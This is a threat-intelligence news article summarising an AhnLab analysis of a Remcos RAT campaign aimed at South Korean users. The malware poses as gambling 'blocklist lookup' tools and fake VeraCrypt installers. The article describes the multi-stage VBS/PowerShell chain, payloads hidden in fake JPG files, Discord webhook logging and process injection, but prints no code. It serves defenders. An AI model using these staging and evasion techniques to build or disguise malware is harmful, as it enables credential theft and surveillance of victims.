AhnLab Security Intelligence Center (ASEC) has identified an active Remcos RAT campaign targeting users in South Korea.
The malware is being spread through multiple channels. It often masquerades as VeraCrypt utilities or tools used within illegal online gambling ecosystems.
Once installed, the RAT can steal login credentials, monitor user activity, and give attackers remote control over compromised systems.
In the first infection scenario, the malware is disguised as a “Blocklist User DB Lookup *****Club” program. In illegal gambling circles, “Blocklist user” typically refers to accounts that have been restricted or flagged due to suspicious or unwanted activity.
The program’s GUI pretends to query a remote database functioning as a command-and-control (C2) server to check these restricted accounts.
The malware has been distributed through web browsers and Telegram using filenames such as:
Distribution Path
| Distribution Path |
|---|
| %USERPROFILE%\downloads\programs*****usercon.exe |
| %USERPROFILE%\downloads\telegram desktop*****usercon.exe |
| %USERPROFILE%\downloads\programs\blackusernon.exe |
These names, along with GUI strings like “*****Club,” strongly suggest that the malware is being spread as a supposed “blocklist user lookup” tool for operators or users of illegal sports‑betting and casino sites.
Although the exact websites used for initial distribution are not yet known, the thematic alignment with gambling tooling indicates a focused targeting of this underground ecosystem.
The fake lookup program’s login function is non‑operational, serving mainly as a decoy. Internally, the executable contains two malicious VBS scripts embedded in its resource section.
When the program runs, these scripts are written to the %TEMP% directory under randomized filenames and then executed, silently starting the infection chain in the background.
A second variant impersonates a VeraCrypt utility installer and is delivered as installer.exe. This sample is packed as a 7z self‑extracting (SFX) archive and similarly includes a malicious VBS script.
By abusing VeraCrypt’s reputation as a legitimate disk encryption tool, attackers increase the chances that general users will trust and execute the installer, extending the campaign’s impact beyond just gambling‑related targets are noted.
The attack chain relies on multiple scripted stages, heavy obfuscation, and misleading file extensions to evade analysis and detection. The stages observed include:
StageTypeName/Example
| Stage | Type | Name/Example |
|---|---|---|
| 1 | Installer | (Fake DB tool / VeraCrypt) |
| 2 | VBS downloader | %TEMP%[Random].vbs |
| 3 | VBS dropper | XX12.JPG |
| 4 | VBS downloader | Config.vbs |
| 5 | VBS downloader | L1k9.JPG |
| 6 | PowerShell downloader | NMA1.JPG |
| 7 | Injector | XIN_PHOTO.JPG |
| 8 | Remcos RAT payload | Aw21.JPG |
The threat actor embeds Base64‑encoded PE payloads inside files that pretend to be JPG images, placing the payload between separator strings and surrounding it with dummy comments and junk data.
After passing through five scripted stages, the chain ultimately drops and executes a . NET‑based injector.
This injector sends execution logs to the attacker via Discord Webhooks, then downloads the Remcos RAT payload from a URL provided as an argument.
It decrypts the payload and injects it into the legitimate AddInProcess32.exe process. Notably, this injector includes Korean‑language messages and strings that are uncommon in other known Remcos workflows, suggesting localization for South Korean victims.
Remcos RAT Capabilities
Remcos RAT is a commercially sold remote administration tool that is frequently abused for malicious purposes. Once installed, it provides attackers with extensive control and data‑theft capabilities, including:
- Remote command execution, file management, and process contro.
- Keylogging and clipboard monitoring.
- Screenshot capture and surveillance via webcam and microphone.
- Theft of stored credentials from web browsers and other applications.
The analyzed samples store their configuration inside an encrypted resource named “SETTINGS.” Once decrypted, this reveals the C2 servers and other parameters. Observed configurations include:
Some variants pretend to be a “stock price ticker” and employ Korean strings in mutex names and registry keys.
In versions where offline keylogging is enabled, captured keystrokes are stored locally under %ALLUSERSPROFILE%\remcos\, further exposing victims’ login IDs, passwords, and other sensitive text input.
The campaign demonstrates that Remcos RAT operators are actively targeting South Korean users, with a particular focus on individuals involved in illegal online gambling.
At the same time, the use of bogus VeraCrypt installers shows that regular users can also be affected if they download tools from untrusted sources.
Because Remcos supports remote control, credential theft, keylogging, and complete user surveillance, an infection can lead to severe privacy violations, account takeover, and potential financial loss.
Users and organizations should avoid downloading software from unknown or unofficial sources, verify installers via checksums or trusted portals, and maintain up‑to‑date security solutions capable of detecting script‑based downloaders, obfuscated VBS/PowerShell, and RAT behavior.
Any system suspected of infection should be isolated, thoroughly scanned, and have all credentials changed immediately after remediation.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.